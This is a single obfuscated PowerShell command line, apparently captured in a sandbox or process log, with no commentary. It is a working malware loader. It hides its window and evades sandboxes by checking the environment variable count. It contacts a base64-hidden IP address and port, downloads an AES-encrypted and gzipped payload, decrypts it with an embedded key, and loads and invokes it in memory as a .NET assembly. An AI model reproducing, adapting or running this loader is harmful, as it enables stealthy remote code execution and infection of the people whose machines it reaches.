powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command if ([System.Environment]::GetEnvironmentVariables().Count -lt 10) {exit -65536;} $gutteMourner = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('OTEuMjE1Ljg1LjE5OA==')); $gutteMucuna = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NTc2OTE=')); $keuperOutwars = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NjExYjg=')); $gutteSheols = new-object System.Net.Sockets.TcpClient; $gutteSheols.Connect($gutteMourner, [int]$gutteMucuna); $vulgareMourner = $gutteSheols.GetStream(); $gutteSheols.SendTimeout = 300000; $gutteSheols.ReceiveTimeout = 300000; $keuperSheols = [System.Text.StringBuilder]::new(); $keuperSheols.AppendLine('GET /' + $keuperOutwars); $keuperSheols.AppendLine('Host: ' + $gutteMourner); $keuperSheols.AppendLine(); $outwarsGutte = [System.Text.Encoding]::ASCII.GetBytes($keuperSheols.ToString()); $vulgareMourner.Write($outwarsGutte, 0, $outwarsGutte.Length); $mucunaThymoma = New-Object System.IO.MemoryStream; $vulgareMourner.CopyTo($mucunaThymoma); $vulgareMourner.Dispose(); $gutteSheols.Dispose(); $mucunaThymoma.Position = 0; $keuperAnitos = $mucunaThymoma.ToArray(); $mucunaThymoma.Dispose(); $vulgareSheols = [System.Text.Encoding]::ASCII.GetString($keuperAnitos).IndexOf('`r`n`r`n')+1; $mournerVulgare = [System.Text.Encoding]::ASCII.GetString($keuperAnitos[$vulgareSheols..($keuperAnitos.Length-1)]); $mournerVulgare = [System.Convert]::FromBase64String($mournerVulgare); $crowbarGutte = New-Object System.Security.Cryptography.AesManaged; $crowbarGutte.Mode = [System.Security.Cryptography.CipherMode]::CBC; $crowbarGutte.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $crowbarGutte.Key = [System.Convert]::FromBase64String('lomtSWepOi9ANHaGs04n/oyLQvoNMdWa/8UbRPmoKMM='); $crowbarGutte.IV = [System.Convert]::FromBase64String('lVFjky2XnqEcCoN0oL6U8A=='); $crowbarVulgare = $crowbarGutte.CreateDecryptor(); $mournerVulgare = $crowbarVulgare.TransformFinalBlock($mournerVulgare, 0, $mournerVulgare.Length); $crowbarVulgare.Dispose(); $crowbarGutte.Dispose(); $thymomaVulgare = New-Object System.IO.MemoryStream(, $mournerVulgare); $anitosGutte = New-Object System.IO.MemoryStream; $thymomaKeuper = New-Object System.IO.Compression.GZipStream($thymomaVulgare, [IO.Compression.CompressionMode]::Decompress); $thymomaKeuper.CopyTo($anitosGutte); $mournerVulgare = $anitosGutte.ToArray(); $mournerAnitos = [System.Reflection.Assembly]::Load($mournerVulgare); $sheolsMucuna = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Zm9yZmFyZUt1cnU=')); $outwarsAnitos = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('dnVsZ2FyZVRoeW1vbWE=')); $crowbarOutwars = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('bXVjdW5hU2hlb2xz')); $keuperVulgare = $mournerAnitos.GetType($sheolsMucuna + '.' + $outwarsAnitos); $vulgareMucuna = $keuperVulgare.GetMethod($crowbarOutwars); $vulgareMucuna.Invoke($mournerSheols, (, [string[]] ('C:\Users\test22\AppData\Local\Temp\originalbuild.exe'))); #($mournerSheols, $mournerSheols);
2744